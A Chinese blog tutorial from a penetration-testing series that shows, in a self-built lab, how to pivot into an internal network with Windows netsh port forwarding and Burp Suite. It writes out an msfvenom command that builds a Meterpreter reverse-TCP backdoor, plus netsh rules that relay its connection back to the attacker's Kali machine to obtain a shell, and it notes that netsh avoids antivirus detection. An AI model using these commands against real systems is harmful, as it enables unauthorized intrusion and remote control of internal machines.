渗透测试-地基篇-隧道之netsh内网穿透篇(二十)

最新推荐文章于 2023-06-29 11:21:43 发布
最新推荐文章于 2023-06-29 11:21:43 发布
阅读量1.5k 收藏 5
点赞数 1
分类专栏: 红队-地基-必会 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34801745/article/details/111089087
版权

**

渗透测试-地基篇-netsh内网穿透篇(二十)

**

作者:大余
时间:2020-12-13

简介:

渗透测试-地基篇:
该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。

请注意:

对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

名言:

你对这行的兴趣,决定你在这行的成就!

文章目录

一、前言

在渗透测试中,当我们获得了外网服务器(如web服务器,ftp服务器,mali服务器等等)的一定权限后发现这台服务器可以直接或者间接的访问内网。

此时渗透测试进入后渗透阶段后,内网中的其他机器是不允许外网机器访问的。这时候,我们可以通过端口转发(隧道) 或将这台外网服务器设置成为代理,使得我们自己的攻击机(kali)可以直接访问与操作内网中的其他机器。实现这一过程的手段就叫做内网转发。

在很多时候我们获取到的服务器的权限不够,无法直接登录。如果直接登录服务器中进行操作,我们需要上传工具进行很多操作,如果服务器缺少对应的环境变量或者组件,会导致渗透受阻。 而且远程登录会留下比较明显的痕迹 ,因此内网转发是我们最好的选择,在本地进行操作是最方便的!!

二、环境介绍

攻击设备:kali-2020.4
外网IP地址:192.168.175.145

代理服务器:windows7
外网IP地址:192.168.175.175
内网IP地址:10.10.1.5

Web服务器:windows2003
内网IP地址:10.10.1.6

外网网关:192.168.175.2
在这里插入图片描述

目前Web服务器在内网环境,kali只能访问代理服务器并拿到了webshell提权成功后,由于代理服务器功能权限局限性大,本篇文章讲解在后渗透中常用的一种方法,netsh来端口转发和端口映射使得攻击者能正常访问内网业务,还会写到配置Burpsuite如何对在外网分析内网的web业务情况!

三、netsh端口映射

netsh 是 windows 系统自带的一个命令行工具,这个工具可以内置中端口转发功能。

那么将利用windows自带的端口转发netsh interface portproxy通过这个小工具在代理服务器设置端口转发!

1、windows7代理服务器操作

在这里插入图片描述

netsh interface portproxy add v4tov4 listenport=绑定的端口 connectaddress=被攻击者服务器ip connectport=被攻击者服务端口

netsh interface portproxy show all		#查看转发规则

这里新建个端口映射,以及查看转发规则建立成功!

2、netsh成功转发

在这里插入图片描述
可看到成功通过端口转发外网攻击者kali成功通过浏览器访问到了内网web服务器业务页面!

3、Burpsuite配置分析web业务

首先需要下载一个FoxyProxy火狐插件,或者是google的Proxy SwitchyOmega两个非常好用的代理插件!主要因为顺手,当然还可以在IE、火狐上设置全局代理也可以!

这里我不过多介绍怎么简单设置代理了,我前面的文章都介绍过了,开始!

很简单设置代理:
在这里插入图片描述
在这里插入图片描述
可看到成功在外网kali利用bp抓包分析内网业务…很简单吧~

但是这种无法穿透防火墙拦截…下面将介绍netsh如何反向操作无视防火墙!

四、netsh端口转发

通过(三)我们获得了访问内网web服务器业务后,因为目前只能通过访问web,无法通过外网电脑控制内网电脑,如何继续横向或者是在kali上拿到一个内网web服务器的shell权限来控制电脑呢?接下来我演示该思路来突破在外网电脑无法连接内网电脑的情况下,通过代理服务器也能直接拿到内网电脑的shell权限!

1、MSF生成后门

在这里插入图片描述
命令:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.5 lport=6666 -f exe > dayu.exe

2、netsh端口转发

在这里插入图片描述
命令:

netsh interface portproxy add v4tov4 listenport=6666 connectaddress=192.168.175.145 connectport=6666

将连接本地端口6666转发到指定端口6666!

3、外网kali设置MSF监听

在这里插入图片描述
这最基础的了,就带过了~

4、成功拿shell

在这里插入图片描述
这里成功在外网kali上拿到了内网控制权限,可进行任意操作了!

这是一个思路,如何将一个msf生成的后门上传到代理服务器并上传到内网服务器,这是一个免杀的过程,和webshell的过程,这里是提供一个思路,另外如何上传的问题,我都会在别的文章中讲到,都是融会贯通!!

5、常用命令

针对netsh转发常用命令:

根据端口清除规则指定规则:
netsh interface portproxy delete v4tov4 listenport=7777

查看转发规则:
netsh interface portproxy show all

清除所有规则:
netsh interface portproxy reset

五、总结

端口映射与端口转发,用于发布防火墙内部的服务器或者防火墙内部的客户端计算机,有的路由器也有端口映射与端口转发功能。端口映射与端口转发实现的功能类似,但又不完全一样。端口映射是将外网的一个端口完全映射给内网一个地址的指定端口,而端口转发是将发往外网的一个端口的通信完全转发给内网一个地址的指定端口。端口映射可以实现外网到内网和内网到外网双向的通信,而映射转发只能实现外网到内网的单向通信!!

这只是讲解了一个简单的内网穿透思路,由于netsh是windwos自带的,所以自带免杀功能!!非常的实用!!

看完的小伙伴如果会的也操作一遍吧!

今天基础牢固就到这里,虽然基础,但是必须牢记于心。

要是你觉得这篇博客写的还不错,欢迎分享给身边的人,欢迎加入免费群共同学习成长。

在这里插入图片描述

如失效加个人以下图,个人微信拉入群。

在这里插入图片描述

大余xiyou
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
c++使用netsh命令_渗透常用命令IPC$内(一)
weixin_34670892的博客
12-23 542
一、IPC$命令IPC$命令在内渗透测试中还是经常使用的,也是一款不错的命令。说白了就是一个共享命名管道的资源,它是为了让进城间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,从而在本机进行远程管理目标主机和查看目标主机的共享资源。 ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445...
渗透测试-隧道netsh穿透
m0_60571990的博客
12-04 696
渗透测试-隧道netsh穿透
了解内穿透
qq_45781155的博客
07-02 958
穿透的概念: 内穿透,也即 NAT 穿透,进行 NAT 穿透是为了使具有某一个特定源 IP 地址和源端口号的数据包不被 NAT 设备屏蔽而正确路由到内主机。下面就相互通信的主机在络中与 NAT 设备的相对位置介绍内穿透方法。 通信双方一台位于 NAT 之后: 一台主机有一个公 IP,另一台主机有一个内 IP。 Client A 位于 NAT 之后,并拥有[IP 地址:端口]对[10.0.0.1:1234],Client B位于 NAT 之前,并拥有[IP 地址:端口]对[138.76.2
渗透测试-地基-Metasploit meterpreter篇(十八)
qq_34801745的博客
12-07 1264
** 渗透测试-地基-渗透Metasploit meterpreter篇(十八) ** 作者:大余 时间:2020-12-04 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言:
渗透-穿透工具
小刚的博客
12-06 1226
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 WIN本地获取Hash内穿透lcxnetshiptablesEarthworm端口复用reGeorg小结 内穿透 想从外渗透主机,但内很多主机不直接连外,所以要进行搭建通道 (前提是已经控制了一台主机,通过这台主机渗透其他内主机) win端口转发:lcx.exe netsh linux端口转发:portmap iptables 多平台:Earthworm 端口复用:reGeorg .
AHZY-安全攻防2020-01-12 内安全攻防知识分享,
08-20
安全攻防是络安全领域中的重要组成部分,尤其是在企业或组织内部,内的安全性直接影响到数据保护和业务运行的稳定性。以下是一些内安全攻防的基本知识点和技巧: 1. **信息搜集**:在进行内安全防护...
bat批处理笔记(四)-netsh命令
01-09
netsh(Network Shell)是一个windows系统本身提供的功能强大的络配置命令行工具,可用来修改windows的ip,关,dns,防火墙等信息. 1.netsh修改ip,关,dns: (1)备份络配置: netsh dump > 路径 (2)设置静态ip: ...
Trbdk3-NetSH-开源
05-03
【标题】"Trbdk3-NetSH-开源"是一个基于开源原则的络配置管理工具,它为用户提供了一个友好的前端界面,以替代传统的命令行工具netsh。这个项目的目标是简化络设置的保存和重新加载过程,使得非技术用户也能更...
Access-based Enumeration for sever 2003.zip
02-05
这通常通过“文件服务器资源管理器”或命令行工具如“Server Manager”或“Netsh”来完成。配置时,可以为特定的共享文件夹启用此功能,也可以全局应用到整个服务器。 2. **权限检查**:当用户尝试访问共享文件夹时...
Windows netsh 命令实现端口转发(端口映射)-易语言
06-14
有时候不想暴露真实服务器IP和端口,所以就借用了端口转发软件。翻遍市面上源码,大都是需要运行着软件才能工作,这些软件并发性能不高,可能堵塞,数据丢失,崩溃情况。 最后发现windows 本身就支持端口转发,执行...
巧用netsh命令实现端口转发(端口映射)不求人
12-28
巧用netsh命令实现端口转发(端口映射)不求人 好处:即时生效,随意修改删除,不影响其他ip映射 记事本保存为bat格式批量添加后,并查看映射:
通道构建——netsh
SheXinK’s Blog
12-26 475
通道构建——netsh1、 测试环境2、 内通道构建2.1、socks4a代理2.2、socks5代理 1、 测试环境   攻击机:192.168.11.131   Target1:192.168.11.151 192.168.21.101   Target2:192.168.21.102   攻击机已拿到Target1的shell,需通过Target1构建通道,访问Target2主机,在T...
(公司windows电脑)超实用方法实现一键实现内穿透
qq_34701838的博客
11-16 1772
使用kodexplorer搭建的家庭私有云一键实现内穿透 随着移动设备的兴起,数据与日剧增,每天都会产生大量的数据,越来越多的个人用户对存储空间有了更高的需求,很多个人家庭用户都已开始自己搭建私有云储存来管理家庭日常产生的数据。利用kodexplorer搭建的本地家庭私有云,只能在内访问,这样限制了我们很大的使用空间,所以内穿透便是一个令私有云更为实用的方法。 话不多说直接上教程: 准备工作:废旧电脑一台,可道云kodexplorer安装包,utools工具(一键实现内穿透) 第一步...
转发之Netsh端口转发的使用学习
来到了学渣的博客
06-02 2030
Netsh是什么 netsh(Network Shell) 是一个windows系统本身提供的功能强大的络配置命令行工具。自Windows XP开始,Windows中就内置络端口转发的功能。任何传入到本地端口的TCP连接(IPv4或IPv6)都可以被重定向到另一个本地端口,或远程计算机上的端口,并且系统不需要有一个专门用于侦听该端口的服务。 现在搭配好一个简单模拟内的环境(简单的搭配过程),nat假设一个外,lan作一个内 Win10 192.168.10.1 win7双卡 nat 192.
通过外访问内服务器
weixin_33892359的博客
04-18 72
一、可以通过netsh在外服务器添加端口映射来实现。 1、新增映射 netsh interface portproxy add v4tov4 listenaddress=公IP listenport=侦听端口号 connectaddress=内IP connectport=链接到的端口号 2、删除映射 netsh interface portproxy deletev4to...
渗透测试 | 无线渗透 | 1-802.11 标准
太尉司马懿的博客
09-25 428
目录 1-无线技术特点 2-IEEE 3-80211标准 1-80211 2-80211b 3-80211a 4-80211g 5-80211n1-无线技术特点 行业发展迅猛,无线技术变化快,难度大 互联的重要入口 络边界模糊 相对有线络,安全实施缺失而且困难 络工程师对技术不了解而造成配置不当 企业络私自介入AP破坏络边界 安全性差 2-IEEEIEEE:制定标准,指导行业技术的发展
windows端口映射命令
最新发布
huayimy的博客
06-29 2363
在windows系统中按windows键+R键打开运行窗口输入cmd点确定,然后输入以下命令。在windows系统中按windows键+R键打开运行窗口输入cmd点确定,然后输入以下命令。在windows系统中按windows键+R键打开运行窗口输入cmd点确定,然后输入以下命令。windows操作系统络端口映射命令-PENGPHP景恒
windows命令行下用netsh实现端口转发(端口映射)
chuchaner7283的博客
06-18 918
微软Windows的netsh是一个命令行脚本实用工具。使用netsh工具 ,可以查看或更改本地计算机或远程计算机的络配置。不仅可以在本地计算机上运行这些命令,而且可以在络上的远程计算机上运行。 可以手动运行Netsh命令,或创建批处理文件或脚本实现过程的自动化。netsh提供了脚本功能...
红蓝对抗之隧道技术第一篇(内穿透、端口映射&端口转发、Netsh端口转发、CS正反向连接多层内、Burp设置上游代理访问内、MSF protfwd端口转发/重定向)
Love&Share
12-19 2583
在进行内渗透时,由于外主机无法直接连接内主机,所以需要使用隧道技术来搭建连接通道访问内主机即内穿透,先来了解下几种转发技术
渗透实战:信息收集与常用工具解析
渗透流程与思路和工具讲解是一门深入研究的信息安全技术,它关注的是如何通过合法或非法手段评估内部络的安全状况,以发现潜在漏洞。以下是关于内渗透的核心知识点: 1. **内渗透流程**: - **阶段一:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值